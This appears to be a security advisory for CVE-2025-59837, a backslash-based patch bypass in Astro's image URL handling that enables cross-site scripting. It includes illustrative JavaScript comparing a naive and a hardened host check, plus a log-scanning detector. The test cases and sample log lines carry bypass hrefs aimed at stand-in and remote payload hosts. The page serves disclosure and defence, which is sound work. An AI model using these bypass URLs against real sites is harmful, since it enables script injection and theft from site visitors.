Platform
nodejs
Component
astro
Fixed in
5.13.5
5.13.10
CVE-2025-59837 is a patch bypass in the Astro web framework. It defeats the fix shipped for CVE-2025-58179 and re-opens the same cross-site scripting (XSS) path. Astro versions prior to 5.13.10 are affected; the bypass is triggered by crafting a malicious image URL that contains backslashes. The fix is in version 5.13.10.
An attacker who gets a victim to open a crafted URL can run arbitrary JavaScript in the victim's browser, in the security context of the affected site. That allows theft of session cookies (where not HttpOnly), authentication tokens and other personal data exposed to the page, redirection to attacker-controlled sites, defacement, and any action the victim's session is permitted to perform. It does not by itself give code execution on the victim's machine. Because this is a bypass of an earlier patch, sites that applied the fix for CVE-2025-58179 remain exposed. The payload travels inside an image URL, a value that generic input validation often passes through unchanged, so it is easy to miss.
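Why a backslash in an image URL can defeat a host check, as an added example; this is constructed code, not Astro's code and not the exact Astro code path. The WHATWG URL Standard, which Node's `URL` class implements, treats a backslash after a special scheme (http/https) like a slash, so an href that a string check classifies as a "local path" can resolve to a remote host. The site origin, the allowlist and the `naiveIsAllowed` check are assumptions for illustration.

```javascript
// Added example (not Astro's code): a naive href check beside a hardened one.
const SITE_ORIGIN = "https://site.example";             // assumed site origin
const ALLOWED_REMOTE_HOSTS = new Set(["images.example"]); // assumed allowlist

// Naive check, constructed to show the flaw: anything starting with a single
// "/" is taken to be a local asset; only "//host" and "scheme://host" are vetted.
function naiveIsAllowed(href) {
  if (href.startsWith("//")) {
    return ALLOWED_REMOTE_HOSTS.has(href.slice(2).split("/")[0]);
  }
  if (href.startsWith("/")) return true; // "local path": wrong, see "/\\host"
  const m = /^https?:\/\/([^/]+)/.exec(href);
  return m !== null && ALLOWED_REMOTE_HOSTS.has(m[1]);
}

// Hardened check: resolve with the real URL parser against the site origin and
// decide on the parsed host, never on the raw string. Backslashes are refused
// outright, since no legitimate image href needs one.
function hardenedIsAllowed(href) {
  if (href.includes("\\")) return false;
  let url;
  try {
    url = new URL(href, SITE_ORIGIN);
  } catch {
    return false;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  if (url.origin === SITE_ORIGIN) return true; // genuine same-origin asset
  return ALLOWED_REMOTE_HOSTS.has(url.hostname);
}

// The host an href actually resolves to, i.e. what a server-side fetch would hit.
function resolvedHost(href) {
  return new URL(href, SITE_ORIGIN).hostname;
}

const CASES = [
  "/images/logo.png",        // real local asset: both checks accept
  "//images.example/a.png",  // allowlisted protocol-relative: both accept
  "//evil.example/a.png",    // both reject
  "/\\evil.example/a.png",   // naive accepts as "local", yet resolves to evil.example
];

for (const href of CASES) {
  console.log(
    JSON.stringify(href),
    "naive:", naiveIsAllowed(href),
    "hardened:", hardenedIsAllowed(href),
    "resolves to:", resolvedHost(href)
  );
}
```

The fourth case is the shape of the problem: `/\evil.example/a.png` begins with a slash, so a string check files it under local assets, but the parser reads `/\` as `//` and the request leaves for `evil.example`. The hardened version makes the decision on the same parser that will later perform the fetch, which is the property a fix must have.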
Public proof-of-concept (PoC) code is available, so exploitation requires little skill. The vulnerability was publicly disclosed on 2025-10-28. It is not currently listed in the CISA KEV catalog and there are no confirmed reports of active exploitation, but the public PoC raises the likelihood that it will be used.
Exploit Status
EPSS: 0.07% (20th percentile)
The primary mitigation for CVE-2025-59837 is to upgrade to Astro 5.13.10 or later. If upgrading is not immediately feasible, add a Web Application Firewall (WAF) rule that blocks requests to the image endpoint whose URL parameter contains a backslash, matching on the decoded value so that a percent-encoded backslash (%5C) is caught as well as a literal one; the pattern from the public PoC looks like \raw.githubusercontent.com. Treat this as a stopgap, not a fix. Also review how user-supplied image URLs reach the image handling code, and monitor application and access logs for requests carrying backslashes in image URLs. After upgrading, confirm the fix by sending a known malicious URL from the PoC and verifying that no script executes and no remote fetch occurs.
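Detection logic over sample access log lines, as an added example that is not part of the original page or of Astro: it flags image-endpoint requests whose href contains a backslash, literal or percent-encoded, and shows why a WAF rule that matches only a literal backslash is insufficient. The endpoint path `/_image` and the `href` query parameter are assumptions here; adjust them to your deployment. The log lines are constructed for the example.

```javascript
// Added example (not Astro's code): scan access logs for the backslash pattern.
const IMAGE_ENDPOINT = "/_image"; // assumed image endpoint path

// Constructed sample lines in combined log format.
const SAMPLE_LOG = `
203.0.113.7 - - [28/Oct/2025:10:01:02 +0000] "GET /_image?href=%2Fimages%2Flogo.png&w=400&f=webp HTTP/1.1" 200 5120
203.0.113.9 - - [28/Oct/2025:10:01:09 +0000] "GET /_image?href=/\\raw.githubusercontent.com/a/b/payload.svg&w=400 HTTP/1.1" 200 904
203.0.113.9 - - [28/Oct/2025:10:01:15 +0000] "GET /_image?href=%2F%5Craw.githubusercontent.com%2Fa%2Fb%2Fpayload.svg&w=400 HTTP/1.1" 200 904
198.51.100.4 - - [28/Oct/2025:10:02:00 +0000] "GET /blog/hello-world/ HTTP/1.1" 200 8192
`.trim().split("\n");

// Pull the request target out of the quoted request line.
function parseRequestTarget(line) {
  const m = /"(?:GET|HEAD|POST) (\S+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : null;
}

// A rule that matches only a literal backslash in the raw request line.
// It misses the percent-encoded variant, which is the point of the example.
function naiveWafMatch(line) {
  const target = parseRequestTarget(line);
  return target !== null && target.includes("\\");
}

// Decode first, then decide: searchParams.get() percent-decodes, so %5C and a
// literal backslash both surface as "\" in the href value.
function suspiciousImageHrefs(lines) {
  const hits = [];
  for (const line of lines) {
    const target = parseRequestTarget(line);
    if (target === null) continue;
    let url;
    try {
      url = new URL(target, "http://log.invalid"); // dummy base, only the target matters
    } catch {
      continue;
    }
    if (url.pathname !== IMAGE_ENDPOINT) continue;
    const href = url.searchParams.get("href");
    if (href !== null && href.includes("\\")) hits.push({ line, href });
  }
  return hits;
}

for (const line of SAMPLE_LOG) {
  console.log("literal-only rule:", naiveWafMatch(line), "|", line);
}
for (const hit of suspiciousImageHrefs(SAMPLE_LOG)) {
  console.log("FLAGGED href:", JSON.stringify(hit.href));
}
```

Both attacker lines decode to the same href, `/\raw.githubusercontent.com/...`, but only the first would trip a rule written against the raw request line. Any WAF or log search for this CVE needs to run after URL decoding, or match `%5C` explicitly alongside the literal character.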
Update Astro to version 5.13.10 or higher, which contains the fix for this SSRF/XSS issue. Run `npm update astro` or `yarn upgrade astro`; note that `npm update` only moves within the version range declared in package.json, so if the installed version does not reach 5.13.10 run `npm install astro@^5.13.10` instead. Confirm with `npm ls astro` that the resolved version is 5.13.10 or later.
CVE-2025-59837 is a patch bypass vulnerability in Astro, allowing attackers to inject malicious scripts via backslashes in image URLs, potentially leading to data theft and account takeover.
You are affected if your site runs any Astro version earlier than 5.13.10; the bypass is reached through manipulated image URLs.
Upgrade to Astro 5.13.10 or later. As a temporary workaround, add a WAF rule that blocks image-endpoint requests containing a backslash, whether literal or percent-encoded (%5C).
While there are no confirmed reports of active exploitation, the availability of a public proof-of-concept increases the risk.
Refer to the Astro security advisory on their GitHub repository: [https://github.com/withastro/astro/security/advisories/CVE-2025-59837](https://github.com/withastro/astro/security/advisories/CVE-2025-59837)